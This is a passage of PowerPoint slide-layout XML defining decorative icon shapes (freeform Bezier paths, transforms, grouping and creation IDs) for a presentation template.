            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="7356324" y="1217852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36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A7B9AA7-F399-4BF8-8B1A-3FAAEAA123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859567" flipH="1" flipV="1">
              <a:off x="10501760" y="5059795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8" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D10E7242-61D4-48A6-B99D-77A21B6D1163}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="2112827" flipH="1" flipV="1">
              <a:off x="10761226" y="1169902"/>
              <a:ext cx="314410" cy="448364"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 176 w 190"/>
                <a:gd name="T1" fmla="*/ 101 h 272"/>
                <a:gd name="T2" fmla="*/ 178 w 190"/>
                <a:gd name="T3" fmla="*/ 82 h 272"/>
                <a:gd name="T4" fmla="*/ 96 w 190"/>
                <a:gd name="T5" fmla="*/ 0 h 272"/>
                <a:gd name="T6" fmla="*/ 14 w 190"/>
                <a:gd name="T7" fmla="*/ 82 h 272"/>
                <a:gd name="T8" fmla="*/ 17 w 190"/>
                <a:gd name="T9" fmla="*/ 103 h 272"/>
                <a:gd name="T10" fmla="*/ 0 w 190"/>
                <a:gd name="T11" fmla="*/ 272 h 272"/>
                <a:gd name="T12" fmla="*/ 190 w 190"/>
                <a:gd name="T13" fmla="*/ 272 h 272"/>
                <a:gd name="T14" fmla="*/ 176 w 190"/>
                <a:gd name="T15" fmla="*/ 10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272">
                  <a:moveTo>
                    <a:pt x="176" y="101"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="95"/>
                    <a:pt x="178" y="89"/>
                    <a:pt x="178" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="37"/>
                    <a:pt x="141" y="0"/>
                    <a:pt x="96" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="0"/>
                    <a:pt x="14" y="37"/>
                    <a:pt x="14" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="89"/>
                    <a:pt x="15" y="96"/>
                    <a:pt x="17" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="135"/>
                    <a:pt x="66" y="224"/>
                    <a:pt x="0" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="272"/>
                    <a:pt x="190" y="272"/>
                    <a:pt x="190" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="227"/>
                    <a:pt x="174" y="133"/>
                    <a:pt x="176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9" name="Oval 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2B0B0D-B193-453D-904F-CAADF3850EA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588421" flipH="1" flipV="1">
              <a:off x="10156596" y="2992219"/>
              <a:ext cx="308669" cy="3058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8B5EB343-2229-409D-AA55-D39C4049F4F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3049414" y="2549041"/>
              <a:ext cx="1482221" cy="1396254"/>
              <a:chOff x="10008697" y="-1027479"/>
              <a:chExt cx="1482221" cy="1396254"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="140" name="Freeform 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F09AC4F-1203-48A8-81B1-EF97EEB8858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 flipH="1" flipV="1">
                <a:off x="10008697" y="-842504"/>
                <a:ext cx="626317" cy="888722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1" name="Freeform 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{601C5670-E7E0-44A3-9825-B79085A7EEAF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 flipH="1" flipV="1">
                <a:off x="10377586" y="-1027479"/>
                <a:ext cx="1113332" cy="1396254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1" name="Freeform 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD204AA2-FB77-4DCF-AC9F-2B062AFB1F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3251596" flipH="1" flipV="1">
              <a:off x="4290187" y="6435218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2" name="Freeform 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA290064-88BE-47F4-BC9A-A60CE09292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36245">
              <a:off x="8553671" y="6461028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23" name="Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB46CBA7-94BA-4FD2-9CE5-8C09A2B21C5C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0193509">
              <a:off x="6771147" y="5836226"/>
              <a:ext cx="542757" cy="1014720"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/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id="{5A4E8397-2A97-4B3D-A986-D2A7888FA4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9" name="Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{617B92CC-E406-4C44-9990-752AB01D6B9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1E6BF868-4815-4E6A-B93D-AC508A0B4E64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="9341120">
              <a:off x="1821535" y="1348798"/>
              <a:ext cx="1240338" cy="634328"/>
              <a:chOff x="10078074" y="1730681"/>
              <a:chExt cx="695325" cy="355600"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="136" name="Oval 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E10FE37-FB06-40EF-BA8E-6F072B43B21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078074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Freeform 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63D7F8AA-7E9E-41A2-A9FE-27D90AE51B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5" name="Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDD19D0E-3E2C-4B4A-94B8-73808597B48E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3493065">
              <a:off x="2804166" y="1725999"/>
              <a:ext cx="542757" cy="1014720"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="134" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EA10B7D-F021-4257-BC18-C8659EBC7E2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824BD6B6-2C87-4058-8DD3-923BB53A2BC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6" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F20FB3-3757-4D30-BB63-028702839C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058153" flipH="1" flipV="1">
              <a:off x="1224923" y="5452933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901CC477-1C45-4E85-A9B3-AED771A1B4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964420">
              <a:off x="1462627" y="6236982"/>
              <a:ext cx="601663" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 143 w 160"/>
                <a:gd name="T1" fmla="*/ 0 h 200"/>
                <a:gd name="T2" fmla="*/ 16 w 160"/>
                <a:gd name="T3" fmla="*/ 0 h 200"/>
                <a:gd name="T4" fmla="*/ 0 w 160"/>
                <a:gd name="T5" fmla="*/ 17 h 200"/>
                <a:gd name="T6" fmla="*/ 0 w 160"/>
                <a:gd name="T7" fmla="*/ 183 h 200"/>
                <a:gd name="T8" fmla="*/ 16 w 160"/>
                <a:gd name="T9" fmla="*/ 200 h 200"/>
                <a:gd name="T10" fmla="*/ 143 w 160"/>
                <a:gd name="T11" fmla="*/ 200 h 200"/>
                <a:gd name="T12" fmla="*/ 160 w 160"/>
                <a:gd name="T13" fmla="*/ 183 h 200"/>
                <a:gd name="T14" fmla="*/ 160 w 160"/>
                <a:gd name="T15" fmla="*/ 17 h 200"/>
                <a:gd name="T16" fmla="*/ 143 w 160"/>
                <a:gd name="T17" fmla="*/ 0 h 200"/>
                <a:gd name="T18" fmla="*/ 78 w 160"/>
                <a:gd name="T19" fmla="*/ 193 h 200"/>
                <a:gd name="T20" fmla="*/ 68 w 160"/>
                <a:gd name="T21" fmla="*/ 183 h 200"/>
                <a:gd name="T22" fmla="*/ 78 w 160"/>
                <a:gd name="T23" fmla="*/ 173 h 200"/>
                <a:gd name="T24" fmla="*/ 88 w 160"/>
                <a:gd name="T25" fmla="*/ 183 h 200"/>
                <a:gd name="T26" fmla="*/ 78 w 160"/>
                <a:gd name="T27" fmla="*/ 193 h 200"/>
                <a:gd name="T28" fmla="*/ 148 w 160"/>
                <a:gd name="T29" fmla="*/ 164 h 200"/>
                <a:gd name="T30" fmla="*/ 12 w 160"/>
                <a:gd name="T31" fmla="*/ 164 h 200"/>
                <a:gd name="T32" fmla="*/ 12 w 160"/>
                <a:gd name="T33" fmla="*/ 12 h 200"/>
                <a:gd name="T34" fmla="*/ 148 w 160"/>
                <a:gd name="T35" fmla="*/ 12 h 200"/>
                <a:gd name="T36" fmla="*/ 148 w 160"/>
                <a:gd name="T37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00">
                  <a:moveTo>
                    <a:pt x="1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52" y="200"/>
                    <a:pt x="160" y="192"/>
                    <a:pt x="160" y="183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7"/>
                    <a:pt x="152" y="0"/>
                    <a:pt x="143" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="78" y="193"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="193"/>
                    <a:pt x="68" y="188"/>
                    <a:pt x="68" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="177"/>
                    <a:pt x="73" y="173"/>
                    <a:pt x="78" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="173"/>
                    <a:pt x="88" y="177"/>
                    <a:pt x="88" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="188"/>
                    <a:pt x="84" y="193"/>
                    <a:pt x="78" y="193"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="148" y="164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8" y="12"/>
                    <a:pt x="148" y="12"/>
                    <a:pt x="148" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14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8" name="Freeform 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F34B0BF-AD35-4B3D-AA6F-DE8E04EF5DAA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860707" y="3912187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6438574B-CE4F-417C-90AE-CCDABA70F699}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="12320893">
              <a:off x="11794249" y="4830164"/>
              <a:ext cx="282094" cy="805573"/>
              <a:chOff x="9469654" y="2159644"/>
              <a:chExt cx="752475" cy="2148831"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="131" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA34CC6E-2956-415B-BCBA-380B46ED7E7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2" name="Freeform 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE06BB59-757F-4C31-BAD5-19E7FBB320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3" name="任意多边形 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37CCDEF4-6499-4D4B-A004-D6FC900DB107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30" name="Freeform 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB7CF2C0-B27A-4EF7-A8B8-B44C623EE9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6524507">
              <a:off x="11685027" y="6473052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2360987" y="3910098"/>
            <a:ext cx="4450948" cy="396352"/>
          </a:xfrm>
          <a:noFill/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741890" y="2866548"/>
            <a:ext cx="5951270" cy="653354"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"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4997450" y="2027705"/>
            <a:ext cx="6523037" cy="1145332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr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4997450" y="3173038"/>
            <a:ext cx="6523037" cy="1082874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4997450" y="3173037"/>
            <a:ext cx="652303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95A7044-A6AB-44FD-998C-54EF6DA222EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="20454" y="1341783"/>
            <a:ext cx="4641829" cy="4801842"/>
            <a:chOff x="6411084" y="1289058"/>
            <a:chExt cx="4386534" cy="4537746"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr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D405BE38-2980-4DC3-B5DE-B1F6104B2634}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6411084" y="1703048"/>
              <a:ext cx="1639814" cy="2111058"/>
              <a:chOff x="6242269" y="1314952"/>
              <a:chExt cx="2186337" cy="2814638"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160" name="Freeform 182">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56D75736-E703-483A-9AFB-0DB81A2B0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1500" y="1314952"/>
                <a:ext cx="246623" cy="199648"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 77 w 77"/>
                  <a:gd name="T1" fmla="*/ 7 h 62"/>
                  <a:gd name="T2" fmla="*/ 68 w 77"/>
                  <a:gd name="T3" fmla="*/ 10 h 62"/>
                  <a:gd name="T4" fmla="*/ 75 w 77"/>
                  <a:gd name="T5" fmla="*/ 1 h 62"/>
                  <a:gd name="T6" fmla="*/ 65 w 77"/>
                  <a:gd name="T7" fmla="*/ 5 h 62"/>
                  <a:gd name="T8" fmla="*/ 53 w 77"/>
                  <a:gd name="T9" fmla="*/ 0 h 62"/>
                  <a:gd name="T10" fmla="*/ 38 w 77"/>
                  <a:gd name="T11" fmla="*/ 15 h 62"/>
                  <a:gd name="T12" fmla="*/ 38 w 77"/>
                  <a:gd name="T13" fmla="*/ 19 h 62"/>
                  <a:gd name="T14" fmla="*/ 6 w 77"/>
                  <a:gd name="T15" fmla="*/ 3 h 62"/>
                  <a:gd name="T16" fmla="*/ 3 w 77"/>
                  <a:gd name="T17" fmla="*/ 10 h 62"/>
                  <a:gd name="T18" fmla="*/ 10 w 77"/>
                  <a:gd name="T19" fmla="*/ 24 h 62"/>
                  <a:gd name="T20" fmla="*/ 3 w 77"/>
                  <a:gd name="T21" fmla="*/ 22 h 62"/>
                  <a:gd name="T22" fmla="*/ 3 w 77"/>
                  <a:gd name="T23" fmla="*/ 22 h 62"/>
                  <a:gd name="T24" fmla="*/ 16 w 77"/>
                  <a:gd name="T25" fmla="*/ 37 h 62"/>
                  <a:gd name="T26" fmla="*/ 12 w 77"/>
                  <a:gd name="T27" fmla="*/ 38 h 62"/>
                  <a:gd name="T28" fmla="*/ 9 w 77"/>
                  <a:gd name="T29" fmla="*/ 38 h 62"/>
                  <a:gd name="T30" fmla="*/ 24 w 77"/>
                  <a:gd name="T31" fmla="*/ 48 h 62"/>
                  <a:gd name="T32" fmla="*/ 4 w 77"/>
                  <a:gd name="T33" fmla="*/ 55 h 62"/>
                  <a:gd name="T34" fmla="*/ 0 w 77"/>
                  <a:gd name="T35" fmla="*/ 55 h 62"/>
                  <a:gd name="T36" fmla="*/ 24 w 77"/>
                  <a:gd name="T37" fmla="*/ 62 h 62"/>
                  <a:gd name="T38" fmla="*/ 69 w 77"/>
                  <a:gd name="T39" fmla="*/ 17 h 62"/>
                  <a:gd name="T40" fmla="*/ 69 w 77"/>
                  <a:gd name="T41" fmla="*/ 15 h 62"/>
                  <a:gd name="T42" fmla="*/ 77 w 77"/>
                  <a:gd name="T43" fmla="*/ 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" h="62">
                    <a:moveTo>
                      <a:pt x="77" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="8"/>
                      <a:pt x="71" y="9"/>
                      <a:pt x="68" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="8"/>
                      <a:pt x="74" y="4"/>
                      <a:pt x="75" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="3"/>
                      <a:pt x="68" y="4"/>
                      <a:pt x="65" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="2"/>
                      <a:pt x="58" y="0"/>
                      <a:pt x="53" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="0"/>
                      <a:pt x="38" y="7"/>
                      <a:pt x="38" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="17"/>
                      <a:pt x="38" y="18"/>
                      <a:pt x="38" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="18"/>
                      <a:pt x="13" y="12"/>
                      <a:pt x="6" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="5"/>
                      <a:pt x="3" y="8"/>
                      <a:pt x="3" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="16"/>
                      <a:pt x="6" y="21"/>
                      <a:pt x="10" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="24"/>
                      <a:pt x="5" y="23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9"/>
                      <a:pt x="9" y="36"/>
                      <a:pt x="16" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="38"/>
                      <a:pt x="13" y="38"/>
                      <a:pt x="12" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="38"/>
                      <a:pt x="10" y="38"/>
                      <a:pt x="9" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="44"/>
                      <a:pt x="17" y="48"/>
                      <a:pt x="24" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="53"/>
                      <a:pt x="11" y="55"/>
                      <a:pt x="4" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="55"/>
                      <a:pt x="1" y="55"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="59"/>
                      <a:pt x="15" y="62"/>
                      <a:pt x="24" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="62"/>
                      <a:pt x="69" y="38"/>
                      <a:pt x="69" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="17"/>
                      <a:pt x="69" y="16"/>
                      <a:pt x="69" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="13"/>
                      <a:pt x="75" y="10"/>
                      <a:pt x="77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1" name="Freeform 184">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058EF6FF-9437-41AB-A602-6244FB2024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46379" y="2080266"/>
                <a:ext cx="246623" cy="246623"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 77"/>
                  <a:gd name="T1" fmla="*/ 0 h 77"/>
                  <a:gd name="T2" fmla="*/ 0 w 77"/>
                  <a:gd name="T3" fmla="*/ 39 h 77"/>
                  <a:gd name="T4" fmla="*/ 38 w 77"/>
                  <a:gd name="T5" fmla="*/ 77 h 77"/>
                  <a:gd name="T6" fmla="*/ 77 w 77"/>
                  <a:gd name="T7" fmla="*/ 39 h 77"/>
                  <a:gd name="T8" fmla="*/ 38 w 77"/>
                  <a:gd name="T9" fmla="*/ 0 h 77"/>
                  <a:gd name="T10" fmla="*/ 24 w 77"/>
                  <a:gd name="T11" fmla="*/ 39 h 77"/>
                  <a:gd name="T12" fmla="*/ 38 w 77"/>
                  <a:gd name="T13" fmla="*/ 24 h 77"/>
                  <a:gd name="T14" fmla="*/ 53 w 77"/>
                  <a:gd name="T15" fmla="*/ 39 h 77"/>
                  <a:gd name="T16" fmla="*/ 38 w 77"/>
                  <a:gd name="T17" fmla="*/ 53 h 77"/>
                  <a:gd name="T18" fmla="*/ 24 w 77"/>
                  <a:gd name="T19" fmla="*/ 39 h 77"/>
                  <a:gd name="T20" fmla="*/ 70 w 77"/>
                  <a:gd name="T21" fmla="*/ 52 h 77"/>
                  <a:gd name="T22" fmla="*/ 70 w 77"/>
                  <a:gd name="T23" fmla="*/ 52 h 77"/>
                  <a:gd name="T24" fmla="*/ 56 w 77"/>
                  <a:gd name="T25" fmla="*/ 46 h 77"/>
                  <a:gd name="T26" fmla="*/ 58 w 77"/>
                  <a:gd name="T27" fmla="*/ 39 h 77"/>
                  <a:gd name="T28" fmla="*/ 56 w 77"/>
                  <a:gd name="T29" fmla="*/ 31 h 77"/>
                  <a:gd name="T30" fmla="*/ 66 w 77"/>
                  <a:gd name="T31" fmla="*/ 27 h 77"/>
                  <a:gd name="T32" fmla="*/ 70 w 77"/>
                  <a:gd name="T33" fmla="*/ 26 h 77"/>
                  <a:gd name="T34" fmla="*/ 72 w 77"/>
                  <a:gd name="T35" fmla="*/ 39 h 77"/>
                  <a:gd name="T36" fmla="*/ 70 w 77"/>
                  <a:gd name="T37" fmla="*/ 52 h 77"/>
                  <a:gd name="T38" fmla="*/ 51 w 77"/>
                  <a:gd name="T39" fmla="*/ 7 h 77"/>
                  <a:gd name="T40" fmla="*/ 51 w 77"/>
                  <a:gd name="T41" fmla="*/ 7 h 77"/>
                  <a:gd name="T42" fmla="*/ 51 w 77"/>
                  <a:gd name="T43" fmla="*/ 7 h 77"/>
                  <a:gd name="T44" fmla="*/ 46 w 77"/>
                  <a:gd name="T45" fmla="*/ 21 h 77"/>
                  <a:gd name="T46" fmla="*/ 38 w 77"/>
                  <a:gd name="T47" fmla="*/ 19 h 77"/>
                  <a:gd name="T48" fmla="*/ 31 w 77"/>
                  <a:gd name="T49" fmla="*/ 21 h 77"/>
                  <a:gd name="T50" fmla="*/ 28 w 77"/>
                  <a:gd name="T51" fmla="*/ 14 h 77"/>
                  <a:gd name="T52" fmla="*/ 25 w 77"/>
                  <a:gd name="T53" fmla="*/ 7 h 77"/>
                  <a:gd name="T54" fmla="*/ 38 w 77"/>
                  <a:gd name="T55" fmla="*/ 5 h 77"/>
                  <a:gd name="T56" fmla="*/ 51 w 77"/>
                  <a:gd name="T57" fmla="*/ 7 h 77"/>
                  <a:gd name="T58" fmla="*/ 7 w 77"/>
                  <a:gd name="T59" fmla="*/ 26 h 77"/>
                  <a:gd name="T60" fmla="*/ 14 w 77"/>
                  <a:gd name="T61" fmla="*/ 29 h 77"/>
                  <a:gd name="T62" fmla="*/ 20 w 77"/>
                  <a:gd name="T63" fmla="*/ 31 h 77"/>
                  <a:gd name="T64" fmla="*/ 19 w 77"/>
                  <a:gd name="T65" fmla="*/ 39 h 77"/>
                  <a:gd name="T66" fmla="*/ 20 w 77"/>
                  <a:gd name="T67" fmla="*/ 46 h 77"/>
                  <a:gd name="T68" fmla="*/ 7 w 77"/>
                  <a:gd name="T69" fmla="*/ 52 h 77"/>
                  <a:gd name="T70" fmla="*/ 4 w 77"/>
                  <a:gd name="T71" fmla="*/ 39 h 77"/>
                  <a:gd name="T72" fmla="*/ 7 w 77"/>
                  <a:gd name="T73" fmla="*/ 26 h 77"/>
                  <a:gd name="T74" fmla="*/ 25 w 77"/>
                  <a:gd name="T75" fmla="*/ 70 h 77"/>
                  <a:gd name="T76" fmla="*/ 27 w 77"/>
                  <a:gd name="T77" fmla="*/ 66 h 77"/>
                  <a:gd name="T78" fmla="*/ 31 w 77"/>
                  <a:gd name="T79" fmla="*/ 57 h 77"/>
                  <a:gd name="T80" fmla="*/ 38 w 77"/>
                  <a:gd name="T81" fmla="*/ 58 h 77"/>
                  <a:gd name="T82" fmla="*/ 46 w 77"/>
                  <a:gd name="T83" fmla="*/ 57 h 77"/>
                  <a:gd name="T84" fmla="*/ 51 w 77"/>
                  <a:gd name="T85" fmla="*/ 70 h 77"/>
                  <a:gd name="T86" fmla="*/ 51 w 77"/>
                  <a:gd name="T87" fmla="*/ 70 h 77"/>
                  <a:gd name="T88" fmla="*/ 51 w 77"/>
                  <a:gd name="T89" fmla="*/ 70 h 77"/>
                  <a:gd name="T90" fmla="*/ 38 w 77"/>
                  <a:gd name="T91" fmla="*/ 73 h 77"/>
                  <a:gd name="T92" fmla="*/ 25 w 77"/>
                  <a:gd name="T9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77" h="77">
                    <a:moveTo>
                      <a:pt x="38" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="0"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="0" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="60"/>
                      <a:pt x="17" y="77"/>
                      <a:pt x="38" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="77"/>
                      <a:pt x="77" y="60"/>
                      <a:pt x="77" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="17"/>
                      <a:pt x="60" y="0"/>
                      <a:pt x="38" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="24" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="31"/>
                      <a:pt x="30" y="24"/>
                      <a:pt x="38" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="24"/>
                      <a:pt x="53" y="31"/>
                      <a:pt x="53" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="47"/>
                      <a:pt x="46" y="53"/>
                      <a:pt x="38" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="53"/>
                      <a:pt x="24" y="47"/>
                      <a:pt x="24" y="39"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="70" y="52"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="52"/>
                      <a:pt x="70" y="52"/>
                      <a:pt x="70" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="46"/>
